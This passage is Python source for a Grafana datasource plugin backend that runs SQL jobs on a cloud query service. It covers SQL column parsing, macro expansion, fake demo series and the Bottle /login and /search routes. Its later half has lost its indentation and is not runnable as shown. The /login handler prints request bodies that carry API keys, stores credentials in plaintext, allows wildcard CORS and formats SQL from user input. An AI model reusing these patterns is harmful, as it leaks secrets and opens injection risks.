            if re.search(r"(?i)^select", fragment):
                nested.append(fragment)
        return nested

    columns = []
    for inner in find_nested_selects(sql_stmt):
        columns = columns + parse_sql_columns(inner)
    return columns
def get_columns_from_single_select(sql):
    """Get the list of columns in a 'SELECT' type query.

    Returns an empty list if
    1. not a SELECT statement, or
    2. SELECT * is used.

    History
    -------
    Mar 23, 2021: can detect the proper column name when a comment is used, e.g.
        select distinct col1 -- some comment
        select distinct col1
        -- some comment
    """

    def get_columns(stmt):
        """Return a single column name, a [col1, col2] pair (ts_explode), or ''."""
        # st AS column
        # res = re.search(r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$", stmt)
        res = p_as_column.search(stmt)
        if res:
            return res.group(1)
        # standalone column
        # res = re.search(r'^\s*(\w+)\s*$', stmt)
        res = p_column.search(stmt)
        if res:
            return res.group(1)
        # TS_EXPLODE(...) AS (col1, col2) yields two columns
        res = p_ts_explode.search(stmt)
        if res:
            return [res.group(2), res.group(3)]
        return ""

    def append(columns, res):
        """Accumulate get_columns() output, skipping empty results."""
        if isinstance(res, str):
            if len(res) > 0:
                columns.append(res)
        elif isinstance(res, list):
            for i in res:
                if len(i) > 0:
                    columns.append(i)
        return columns

    columns = []
    parsed = sqlparse.parse(sql)
    try:
        stmt = parsed[0]
    except IndexError as e:
        # unparseable statement: log it before propagating
        print(sql)
        print(parsed)
        raise e
    if stmt.get_type() != "SELECT":
        return columns
    is_present_distinct_all = False
    for token in stmt.tokens:
        if isinstance(token, IdentifierList):
            for identifier in token.get_identifiers():
                res = get_columns(str(identifier))
                columns = append(columns, res)
        if isinstance(token, Identifier):
            # strip '-- ...' comments so the column name itself is matched
            lines = str(token).splitlines()  # ('-- ')
            pre_comment = str(token)
            for line in lines:
                if line.strip().startswith("--"):
                    pass
                else:
                    line = line.split(" --")[0]
                    pre_comment = line
                    break
            res = get_columns(pre_comment)
            columns = append(columns, res)
            is_present_distinct_all = False
        if str(token).lower() in ["distinct", "all"]:
            # DISTINCT/ALL precede the select list; don't stop at this keyword
            is_present_distinct_all = True
        if token.ttype is Keyword and is_present_distinct_all is False:  # FROM: end of select list
            break
    return columns
class TooManyRowsException(Exception):
    """Raised when a query produces more rows than the caller can accept.

    The triggering low-level exception, if any, is kept in
    ``original_exception`` and appended to the message.
    """

    def __init__(self, msg, original_exception=None):
        detail = msg
        if original_exception is not None:
            detail = msg + (": %s" % original_exception)
        super().__init__(detail)
        self.original_exception = original_exception
class NoResultException(Exception):
    """Raised when a query returns no result at all.

    The triggering low-level exception, if any, is kept in
    ``original_exception`` and appended to the message.
    """

    def __init__(self, msg, original_exception=None):
        detail = msg
        if original_exception is not None:
            detail = msg + (": %s" % original_exception)
        super().__init__(detail)
        self.original_exception = original_exception
class SourceType(Enum):
    """How a datasource's input data is specified in the plugin settings."""
    UNUSED = 1  # no input source configured
    TABLE = 2   # a catalog table name is used
    COSURL = 3  # a Cloud Object Storage URL (plus storage format) is used
def RepresentsInt(s):
    """Return True if *s* can be converted to an int, False otherwise.

    Parameters
    ----------
    s:
        typically a string coming from the HTTP request body; surrounding
        whitespace is tolerated (``int`` strips it).
    """
    try:
        int(s)
        return True
    except (TypeError, ValueError):
        # TypeError covers None / non-numeric objects, which previously
        # escaped as an uncaught exception instead of returning False
        return False
def process_macro_timeFilterColumn(p_timeFilter, sql_stmt, sdt_from, sdt_to):
    """Expand every ``$__timeFilterColumn(col, type)`` macro in *sql_stmt*.

    Parameters
    ----------
    p_timeFilter:
        compiled regex whose group(1) is the column name and group(2) the
        declared column type
    sql_stmt: str
        the SQL text possibly containing the macro
    sdt_from, sdt_to: str
        the time-range boundaries as datetime strings

    Returns
    -------
    str
        the SQL text with each macro replaced by a BETWEEN predicate
    """
    match = p_timeFilter.search(sql_stmt)
    while match:
        # the $__timeFilterColumn is used
        col_name = match.group(1).strip().lower()
        col_type = match.group(2).strip().lower()
        if col_type == "string":
            # a string-typed column already holds a timestamp literal
            template = """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")"""
        else:
            # numeric column: assumed to be epoch milliseconds
            template = """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))"""
        predicate = template.format(
            time_col=col_name, dt_from=sdt_from, dt_to=sdt_to
        )
        sql_stmt = p_timeFilter.sub(predicate, sql_stmt, count=1)
        match = p_timeFilter.search(sql_stmt)
    return sql_stmt
def process_macro_data_source(p_reg, func_get_macro_mapping, key, sql_stmt):
    """
    process $__source macro

    Parameters
    ----------
    p_reg:
        pattern object to detect the present of the macro
    func_get_macro_mapping:
        a function that translate from a key to the right data source configured
    key: string
        the key that is used to identify the right data source
    sql_stmt: str
        the SQL string

    Returns
    -------
    the decoded SQL string; on a missing-credential KeyError a
    (None, HTTPResponse) tuple is returned instead
    """
    occurrences = p_reg.findall(sql_stmt)
    try:
        replacement = func_get_macro_mapping(key)
    except KeyError:
        # TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
        msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
        return (
            None,
            HTTPResponse(
                body=json.dumps({"error": msg}),
                status=403,
                headers={"Content-type": "application/json"},
            ),
        )
    if len(occurrences) > 0 and len(replacement) == 0:
        msg = "Can't use $__source (default value has not been configured yet)"
        raise HTTPResponse(
            body=json.dumps({"error": msg}),
            status=403,
            headers={"Content-type": "application/json"},
        )
    # substitute one occurrence per original match
    for _ in occurrences:
        if p_reg.search(sql_stmt):
            # the $__source is used
            sql_stmt = p_reg.sub(replacement, sql_stmt, count=1)
    return sql_stmt
def revise_time_column(time_col, df):
    """
    the dataframe may has a column representing datetime, but it may be in string format
    we need to convert to the right format

    Sorts *df* in place by *time_col*; when the column holds ISO-8601
    strings ending in 'Z' it is rewritten as "YYYY-MM-DD HH:MM:SS" strings.

    Parameters
    ----------
    time_col: str
        name of the column holding the time values
    df: pandas.DataFrame
        the frame to revise (mutated in place and also returned)
    """
    df.sort_values(by=time_col, inplace=True)
    if df.empty:
        # nothing to inspect or convert
        return df
    # BUG FIX: df[time_col][0] is a *label* lookup; after sorting, label 0
    # is not necessarily the first row (and may not exist for non-range
    # indexes). Use positional access instead.
    first_value = df[time_col].iloc[0]
    if isinstance(first_value, str) and first_value.endswith("Z"):
        # remove 'Z' from datetime and map to string representation;
        # try fractional seconds first, then whole seconds
        try:
            tmp = [
                str(x)
                for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ")
            ]
        except ValueError:
            tmp = [
                str(x)
                for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%SZ")
            ]
        df[time_col] = tmp
    # datetime64[ns] --> convert to 'ms'
    # df[time_col] = pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ").values.astype('int64') // 10**6
    # .values.astype('int64') // 10**6
    return df
class CloudSQLDB(dict):
    """Registry of Grafana datasource configurations, persisted as JSON.

    Maps a datasource key (built by ``gen_key``) to the settings dict the
    Grafana plugin sent at /login time.  The dict content is written to
    ``cloud_cos_db.json`` so it survives webapp restarts.  Also caches
    randomly generated demo time-series frames per datasource key.
    """

    def __init__(self, *arg, **kw):
        super(CloudSQLDB, self).__init__(*arg, **kw)
        # file that persists this dict as JSON across restarts
        self.db_file = "cloud_cos_db.json"
        # file name reserved for pickled SQL clients (not read in this class)
        self.sqlclient_file = "sqlclient_db.pkl"
        self.read()
        # holding fake time-series data source
        self._current_ts_df = {}
        self._current_mts_df = {}

    # @property
    # def data(self):
    #     return self._content

    def read(self):
        """Load previously saved configurations from ``self.db_file``.

        A missing file is not an error (first run).
        """
        _content = None
        try:
            with open(self.db_file, "r") as read_file:
                _content = json.load(read_file)
        except FileNotFoundError:
            pass
        if _content:
            for k, v in _content.items():
                self[k] = v

    def save_no_interrupt(self):
        """Run :meth:`save` on a worker thread and wait for it.

        NOTE(review): the join makes this synchronous; presumably the
        thread is used so a KeyboardInterrupt in the main thread cannot
        abort the file write mid-way — confirm intent.
        """
        a = Thread(target=self.save)
        a.start()
        a.join()

    def save(self):
        """Write the current configuration dict to ``self.db_file`` as JSON.

        Skips the write entirely when the dict is empty.
        """
        if len(self.keys()) > 0:
            with open(self.db_file, "w") as write_file:
                json.dump(self, write_file)

    def get_sqlclient(self, key, thread_safe=False):
        """Return a logged-on SQLClient for datasource *key*.

        With ``thread_safe=False`` the client is cached in the module-level
        ``grafanaPluginInstancesSqlClient`` dict and reused; with
        ``thread_safe=True`` a fresh client is built on every call.
        """
        apiKey = self[key]["apiKey"]
        instance_crn = self[key]["instance_crn"]
        target_cos_url = self[key]["target_cos_url"]
        if thread_safe is False:
            if key in grafanaPluginInstancesSqlClient.keys():
                sqlClient = grafanaPluginInstancesSqlClient[key]
                print("Found SqlClient... ", sqlClient)
            else:
                sqlClient = SQLClient(
                    api_key=apiKey,
                    instance_crn=instance_crn,
                    target_cos_url=target_cos_url,
                    iam_max_tries=IAM_MAX_TRIES,
                    max_tries=MAX_TRIES,
                )
                grafanaPluginInstancesSqlClient[key] = sqlClient
        else:
            sqlClient = SQLClient(
                api_key=apiKey,
                instance_crn=instance_crn,
                target_cos_url=target_cos_url,
                thread_safe=True,
                iam_max_tries=IAM_MAX_TRIES,
                max_tries=MAX_TRIES,
            )
            print("Create thread-safe SqlClient... ", sqlClient)
        sqlClient.logon()
        return sqlClient

    def get_cos_source(self, key):
        """Build the FROM-side source clause for datasource *key*.

        Returns " <table> " when a table is configured, otherwise
        "<cos_url> STORED AS <format>", or "" when nothing usable is set.
        """
        # stored_using_table = tmp_body.get('using_table').strip()
        if self[key]["using_table"]:
            table = self[key]["table"]
            if len(table.strip()) == 0:
                return ""
            else:
                return " {} ".format(table)
        else:
            try:
                cos_in = self[key]["source_cos_url"]
            except KeyError:
                return ""
            if len(cos_in.strip()) == 0:
                return ""
            else:
                format_type = self[key]["format_type"]
                return "{} STORED AS {}".format(cos_in, format_type)

    def get_cos_source_using(self, key):
        """Like :meth:`get_cos_source` but for the "USING ... LOCATION"
        syntax: returns "<format> LOCATION <cos_url>" for a COS source.
        """
        # stored_using_table = tmp_body.get('using_table').strip()
        if self[key]["using_table"]:
            table = self[key]["table"]
            if len(table.strip()) == 0:
                return ""
            else:
                return " {} ".format(table)
        else:
            try:
                cos_in = self[key]["source_cos_url"]
            except KeyError:
                return ""
            if len(cos_in.strip()) == 0:
                return ""
            else:
                format_type = self[key]["format_type"]
                return "{} LOCATION {}".format(format_type, cos_in)

    def get_cos_dest(self, key, suffix, format_type):
        """Build the "INTO <target>/<suffix> STORED AS <format>" clause."""
        # stored_using_table = tmp_body.get('using_table').strip()
        # if self[key]['target_cos_url'][-1] == '/':
        cos_out = "/".join([self[key]["target_cos_url"], suffix])
        cos_out = "INTO {} STORED AS {} ".format(cos_out, format_type)
        return cos_out

    def get_sts_random_data(self, key, dt_from, dt_to):
        """Return a fake single-metric "VALUES ... AS ds" SQL fragment.

        Generates random (timestamp-ms, observation) rows across
        [dt_from, dt_to], caching and extending previous data per *key* so
        repeated calls look like a continuously growing series.
        """
        # the initial literal below is dead code: it is unconditionally
        # overwritten with generated data before returning
        values = """
        FROM VALUES -- timestamp, observation
        (1, 10), (2, 20), (3, 30), (4, 40),
        (5, 5), (6, 10), (7, 15), (8, 40),
        (9, 100), (10, 200), (11, 300), (12, 400)
        AS ds
        """
        # np.random.seed(2019)
        N = 30
        rng = pd.date_range(dt_from, dt_to, periods=N)
        df = pd.DataFrame(
            np.random.randint(20, size=(N, 2)),
            columns=["timestamp", "observation"],
            index=rng,
        )
        ##.rename(columns={df.index.name:'timestamp'})
        df = df.drop("timestamp", axis=1)
        # df.reset_index(inplace=True)
        # df.rename(columns={"index":"timestamp"})
        # df.index = pd.to_datetime(df['index']).astype(np.int64) // 10**6
        # datetime64[ns] index -> epoch milliseconds
        df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
        if key not in self._current_ts_df:
            self._current_ts_df[key] = df
        else:
            idx_start = (
                pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
            )
            idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
            # idx_start = df.iloc[0].name
            # idx_end = df.iloc[-1].name
            # keep only rows newer than the cached series' last timestamp
            df = df.loc[(df.index > self._current_ts_df[key].iloc[-1].name)]
            # NOTE(review): DataFrame.append was removed in pandas 2.0 —
            # would need pd.concat on newer pandas; confirm pinned version
            self._current_ts_df[key] = self._current_ts_df[key].append(df)
            # NOTE : currently not removing old ones
            # self._current_ts_df[key] = self._current_ts_df[key].loc[(self._current_ts_df[key].index >= idx_start) & (self._current_ts_df[key].index <= idx_end)]
            # df = self._current_ts_df[key]
            df = self._current_ts_df[key].loc[
                (self._current_ts_df[key].index >= idx_start)
                & (self._current_ts_df[key].index <= idx_end)
            ]
        x = list(df.to_records(index=True))
        data = ", ".join([str(i) for i in x])
        assert len(data) > 0
        values = """
        VALUES -- timestamp, observation
        {}
        AS ds
        """.format(
            data
        )
        return values

    def get_mts_random_data(self, key, dt_from, dt_to):
        """Return a fake multi-metric "VALUES ... AS ds" SQL fragment.

        Like :meth:`get_sts_random_data` but each row carries an extra
        metric ``key`` column, producing several interleaved series.
        """
        # dead code: unconditionally overwritten with generated data below
        values = """
        FROM VALUES -- key, timestamp, observation
        (2017, 1 ,100),
        (2017, 1 ,50),
        (2017, 2 ,200),
        (2017, 2 ,300),
        (2018, 1 ,300),
        (2018, 1 ,100),
        (2018, 2 ,400) AS ds
        """
        # np.random.seed(2019)
        num_metrics = 2
        df = None
        for i in range(0, num_metrics + 1):
            N = np.random.randint(20, 30)
            rng = pd.date_range(dt_from, dt_to, periods=N)
            tmp_df = pd.DataFrame(
                np.hstack((np.random.randint(20, size=(N, 1)), np.array([[i] * N]).T)),
                columns=["observation", "key"],
                index=rng,
            )
            if df is None:
                df = tmp_df
            else:
                # NOTE(review): DataFrame.append removed in pandas 2.0
                df = df.append(tmp_df, ignore_index=False)
        idx_start = pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
        idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
        # millisecond
        df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
        if key not in self._current_mts_df:
            self._current_mts_df[key] = df
        else:
            # NOTE(review): _last_mts_idx_end is only assigned at the end of
            # this method; first entry into this branch assumes a prior call
            df = df.loc[(df.index > self._last_mts_idx_end)]
            self._current_mts_df[key] = self._current_mts_df[key].append(df)
            # NOTE : currently not removing old ones
            # self._current_mts_df[key] = self._current_mts_df[key].loc[(self._current_mts_df[key].index >= idx_start) & (self._current_mts_df[key].index <= idx_end)]
            # df = self._current_mts_df[key]
        df = self._current_mts_df[key].loc[
            (self._current_mts_df[key].index >= idx_start)
            & (self._current_mts_df[key].index <= idx_end)
        ]
        x = list(df.to_records(index=True))
        data = ", ".join([str(i) for i in x])
        assert len(data) > 0
        values = """
        VALUES -- timestamp, observation, key
        {}
        AS ds
        """.format(
            data
        )
        self._last_mts_idx_end = idx_end
        return values

    def get_job_id(self, key, refId):
        """return the job_id associated with a given `key`

        Return
        ------
        str: the job_id if found; otherwise return None
        """
        if "refId" not in self[key]:
            # double-checked locking: re-test after acquiring the lock
            with lock_savejob:
                if "refId" not in self[key]:
                    self[key]["refId"] = {}
        if refId in self[key]["refId"]:
            return self[key]["refId"][refId]
        else:
            return None

    def save_job_id(self, key, refId, job_id):
        """save the job_id for the
        (query in the given dashboard/panel) ~ 'refId' and
        (datasource) ~ 'key'

        NOTE: The information will be used by `get_cos_source_prev`"""
        if "refId" not in self[key]:
            # double-checked locking: re-test after acquiring the lock
            with lock_savejob:
                if "refId" not in self[key]:
                    self[key]["refId"] = {}
        self[key]["refId"][refId] = job_id
        self.save_no_interrupt()

    def get_cos_source_prev(self, key, refId):
        """get COS URL from the output of a previous query

        Exceptions
        ----------
        KeyError"""
        sqlClient = self.get_sqlclient(key, thread_safe=True)
        job_id = self[key]["refId"][refId]
        job_info = sqlClient.get_job(job_id)
        res = "{} STORED AS {}".format(
            job_info["resultset_location"], job_info["resultset_format"]
        )
        return res

    def should_sql_stmt_be_run(self, key, refId, sql_stmt, sleep_time):
        """return True if it is safe to launch the query, i.e. no further change to it

        Debounces repeated submissions of the same statement: records the
        current request's timestamp, sleeps *sleep_time* seconds, and
        reports False when a newer request for the same statement arrived
        in the meantime.
        """
        milliseconds_since_epoch = datetime.now().timestamp() * 1000
        print(self)
        # each nesting level uses double-checked locking around dict setup
        if "query" not in self[key]:
            print("query not in self")
            with lock:
                if "query" not in self[key]:
                    self[key]["query"] = {}
        if refId not in self[key]["query"]:
            with lock:
                if refId not in self[key]["query"]:
                    self[key]["query"][refId] = {}
        if sql_stmt not in self[key]["query"][refId]:
            with lock:
                if sql_stmt not in self[key]["query"][refId]:
                    self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
        elif milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
            with lock:
                if milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
                    self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
            sleep(sleep_time)  # seconds
        # if milliseconds_since_epoch == self[key]['query'][refId][sql_stmt]:
        #     # no new request to same query
        #     return True
        if milliseconds_since_epoch < self[key]["query"][refId][sql_stmt]:
            # there is a new request
            return False
        return True
# from cloud_utilities import test_credentials
# ref_cloud_apikey = test_credentials.apikey
# ref_instance_crn = test_credentials.instance_crn
# ref_target_cos_url = test_credentials.result_location

# store information of each datasource-plugin 'id'
grafanaPluginInstances = CloudSQLDB()
# store the object connecting to SQL Client service
grafanaPluginInstancesSqlClient = {}
# data_schema = {}
# default_sql_client = None
# aiOps = SQLClient(api_key=ref_cloud_apikey, instance_crn=ref_instance_crn, target_cos_url=ref_target_cos_url)
##aiOps = SQLClient(api_key=cloud_apikey_raghu, instance_crn=instnacecrn, target_cos_url=target_cos_url, max_concurrent_jobs=4)
# aiOps.logon()
# sqlClient = aiOps
# sqlClient.engine.sql_ui_link()
#
##dict_data = sqlClient.get_cos_summary("cos://s3.us-south.cloud-object-storage.appdomain.cloud/sql-query-cos-access-ts/jobid=a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# df = sqlClient.list_results("a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# print(df.to_string())
# with pd.option_context('display.max_rows', None, 'display.max_columns', None):  # more options can be specified also
#     print(df)

# the Bottle application serving all routes below
app = Bottle()

# demo series: maps a series name to either a callable producing values
# or (for "series B") a marker string handled by create_data_points_name_func
# FUNCTIONS = {'series A': math.sin, 'series B': math.cos}
FUNCTIONS = {"series A": math.sin, "series B": "series B"}

# canned table-mode responses keyed by series name (demo data for /query)
tabular_data = {
    "series A": [
        {
            "columns": [
                {"text": "Time", "type": "time"},
                {"text": "Country", "type": "string"},
                {"text": "Number", "type": "number"},
            ],
            "rows": [[1234567, "SE", 123], [1234567, "DE", 231], [1234567, "US", 321]],
            "type": "table",
        }
    ],
    "series B": [
        {
            "columns": [
                {"text": "Time", "type": "time"},
                {"text": "Country", "type": "string"},
                {"text": "Number", "type": "number"},
            ],
            "rows": [[1234567, "BE", 123], [1234567, "GE", 231], [1234567, "PS", 321]],
            "type": "table",
        }
    ],
}
def convert_to_time_ms(timestamp):
    """Convert a Grafana timestamp to unixtimestamp in milliseconds

    Args:
        timestamp (str): the request contains ``'range': {'from':
        '2019-06-16T08:00:05.331Z', 'to': '2019-06-16T14:00:05.332Z', ...``

    Returns:
        int: epoch milliseconds (UTC); fractional seconds are truncated
        because ``timetuple()`` carries whole seconds only.
    """
    try:
        parsed = datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%fZ")
    except ValueError:
        # BUG FIX: timestamps without a fractional-second part
        # (e.g. '2019-06-16T08:00:05Z') previously raised ValueError
        parsed = datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%SZ")
    return 1000 * timegm(parsed.timetuple())
def create_data_points(func, start, end, length=1020):
    """
    A dummy function to produce sine and cosine data

    You should replace this with your SQL, CQL or Mongo Query language.
    Also, make sure your database has the correct indecies to increase perfomance

    Args:
        func (object) - A callable that accepts a number and returns a number
        start (str) - timestamp
        end (str) - timestamp
        length (int) - the number of data points
    """
    lo = convert_to_time_ms(start)
    hi = convert_to_time_ms(end)
    datapoints = []
    for step in range(length):
        # evenly spaced sample points across [lo, hi)
        t = lo + step * (hi - lo) / length
        datapoints.append([func(t), int(t)])
    return datapoints
def create_data_points_name_func(series_name_or_func, start, end, length=1020):
    """Generate fake data for either a named series or a callable.

    A callable argument is delegated to :func:`create_data_points`; the
    string "series B" yields random integer datapoints.  Any other string
    falls through and yields None (original behavior preserved).
    """
    if not isinstance(series_name_or_func, str):
        func = series_name_or_func
        return create_data_points(func, start, end, length=length)
    series_name = series_name_or_func
    lo = convert_to_time_ms(start)
    hi = convert_to_time_ms(end)
    if series_name == "series B":
        datapoints = []
        for step in range(length):
            t = lo + step * (hi - lo) / length
            datapoints.append([random.randint(0, 100), int(t)])
        return datapoints
    # unknown series name: no data (implicit None in the original)
    return None
@app.route("/", method="GET")
def index():
return "<h1> Hello world</h1>"
@app.route("/login", method=["POST", "GET"])
def login():
"""handle 'testDataSource() - test connection to data source
Returns
-------
str
"OK"
"""
if request.method == "GET":
return "<h1>Testing login</h1>"
logger.debug("========= PRINT REQUEST ============")
logger.debug(request)
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# apiKey = request.forms.get('apiKey')
# instance_crn = request.forms.get('instance_crn')
# result_location = request.forms.get('result_location')
# target_cos_url = request.forms.get('target_cos_url')
# instance_rate_limit = request.forms.get('instance_rate_limit')
print("Handling /login request")
key = gen_key(body.get("id"), body.get("name"))
# always update
data_exist = False
if key in grafanaPluginInstances.keys():
tmp_body = grafanaPluginInstances[key]
stored_apiKey = tmp_body.get("apiKey").strip()
stored_instance_crn = tmp_body.get("instance_crn").strip()
stored_target_cos_url = tmp_body.get("target_cos_url").strip()
stored_source_cos_url = tmp_body.get("source_cos_url", "").strip()
stored_table = tmp_body.get("table", "").strip()
stored_using_table = tmp_body.get("using_table")
stored_instance_rate_limit = tmp_body.get("instance_rate_limit").strip()
stored_format_type = tmp_body.get("format_type", "").strip()
data_exist = True
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['instance_crn'] = body.get('instance_crn')
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['target_cos_url'] = body.get('target_cos_url')
# grafanaPluginInstances[key]['source_cos_url'] = body.get('source_cos_url')
# grafanaPluginInstances[key]['format_type'] = body.get('format_type')
# grafanaPluginInstances[key]['instance_rate_limit'] = body.get('instance_rate_limit')
# extract information
if "instance_crn" not in body or len(body["instance_crn"]) == 0:
msg = "Need CloudSQL CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
instance_crn = body.get("instance_crn").strip()
if "apiKey" not in body or len(body["apiKey"]) == 0:
msg = "Need apiKey"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
apiKey = body.get("apiKey").strip()
# result_location = body.get('result_location').strip()
source_type = SourceType.UNUSED
if "using_table" not in body:
# TODO if this occur - go back and check why default value is not set in Grafana plugin
body["using_table"] = False
if body["using_table"] is False:
if "source_cos_url" in body and len(body["source_cos_url"]) > 0:
source_cos_url = body.get("source_cos_url").strip()
format_type = body.get("format_type").strip()
if source_cos_url is None or not ParsedUrl().is_valid_cos_url(
source_cos_url
):
msg = "Invalid COS URL for source"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
else:
source_type = SourceType.COSURL
else:
if "table" in body and len(body["table"]) > 0:
table = body.get("table").strip()
source_type = SourceType.TABLE
if "target_cos_url" not in body or len(body["target_cos_url"]) == 0:
msg = "Need target COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
target_cos_url = body.get("target_cos_url").strip()
msg = "Need rate limit as an int > 0"
e = HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
if "instance_rate_limit" not in body or len(body["instance_rate_limit"]) == 0:
raise e
elif not RepresentsInt(body["instance_rate_limit"]):
raise e
instance_rate_limit = body.get("instance_rate_limit").strip()
# assert(ref_cloud_apikey == apiKey)
# assert(ref_instance_crn == instance_crn)
if target_cos_url is None or not ParsedUrl().is_valid_cos_url(target_cos_url):
msg = "Invalid COS URL for target"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# print(apiKey)
# print(instance_crn)
# print(result_location)
# print(target_cos_url)
# print(instance_rate_limit)
# logger.info(apiKey)
if key not in grafanaPluginInstancesSqlClient.keys():
# TODO: consider add max_concurrent_jobs info from `instance_rate_limit`
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
# grafanaPluginInstances.save_sqlclients()
else:
sqlClient = grafanaPluginInstancesSqlClient[key]
try:
sqlClient.logon()
if sqlClient.logged_on is True:
if DEBUG:
print("Found SQLClient: ", sqlClient)
except AttributeError:
# recreate
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
response.headers["Content-Type"] = "application/json"
try:
if data_exist and (
stored_apiKey != apiKey
or instance_crn != stored_instance_crn
or stored_target_cos_url != target_cos_url
or instance_rate_limit != stored_instance_rate_limit
):
if DEBUG:
print("HTTP input: ", instance_crn, " \n", apiKey)
sqlClient.configure(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
)
# test API key
sqlClient.logon()
print("SQL URL: ", sqlClient.sql_ui_link())
# test SQL Query CRN
# test COS OUT URL
sql_stmt = """
SELECT 1
INTO {target_cos_url} STORED AS CSV
""".format(
target_cos_url=target_cos_url
)
sqlClient.run_sql(sql_stmt)
# # test COS IN URL
if source_type == SourceType.COSURL:
df = sqlClient.get_schema_data(source_cos_url, type=format_type)
if len(df) == 1 and df["name"][0] == "_corrupt_record":
msg = "Check format for source COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
elif source_type == SourceType.TABLE:
df = sqlClient.describe_table(table)
if df is None:
msg = "Check if table name is correct"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# data_schema[source_cos_url] = sqlClient.get_schema_data(source_cos_url, type=format_type)
print("Login ok")
# response.status = 200
response.status = "200 API Key valid"
# return json.dumps({ 'status': 'success', 'message': 'Success',"data": {} }), 200
theBody = "Login ok."
response.body = theBody
# safe to update
grafanaPluginInstances[key] = body
grafanaPluginInstances.save()
return response
except (ibm_botocore.exceptions.CredentialRetrievalError, AttributeError):
# return BaseResponse(body='Invalid API key', status=401)
msg = "Invalid API key"
if DEBUG:
print(msg)
# response.body = json.dumps({'error':msg})
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except CosUrlNotFoundException as e:
msg = "Wrong COS URL (either source or target) authentication"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except SqlQueryCrnInvalidFormatException as e:
msg = "Wrong Sql Query CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except HTTPResponse as e:
raise e
except Exception as error:
msg = "Unknown error: {}".format(str(type(error)))
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
@app.hook("after_request")
def enable_cors():
"""
Grafana makes AJAX call to the data source in either proxy-mode or direct-mode.
In proxy-mode, Grafana uses its own backend server, and add CORS header to the request.
In direct mode, Grafana sends directly to the rest API app, so the request should contains the CORS request
so that the browser allows Grafana to get the result.
"""
print("after_request hook: enable_cors")
for key in response.headers.keys():
print(response.headers.getall(key))
print("----------")
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers["Access-Control-Allow-Methods"] = "OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Accept, Content-Type"
@app.hook("after_request")
def add_hostname_info():
"""when deploying the webapp via Docker container,
it is good to know the location for debug purpose
return the three-letter location name and the container number from the end of the hostname string.
"""
print("after_request hook: add hostname-info")
for key in response.headers.keys():
print(key, ": ", response.headers.getall(key))
print("----------")
env_host = str(os.environ.get("HOSTNAME"))
hostname = re.findall("[a-z]{3}-\d$", env_host)
if hostname:
response.headers["SP-LOCATION"] = hostname
return response
pass
@app.post("/search")
def search():
"""Return a HTTPResponse containing a JSON array
with the names of the data series available
* headers that specify that this is response is JSON.
Returns
-------
HTTPResponse
list of name of the data series
"""
print(request)
return HTTPResponse(
body=json_dumps(["series A", "series B"]),
headers={"Content-Type": "application/json"},
)
@app.post("/query")
def query():
"""Handle the query from Grafana
This endpoint can return either
* time-series data
* a table for each series
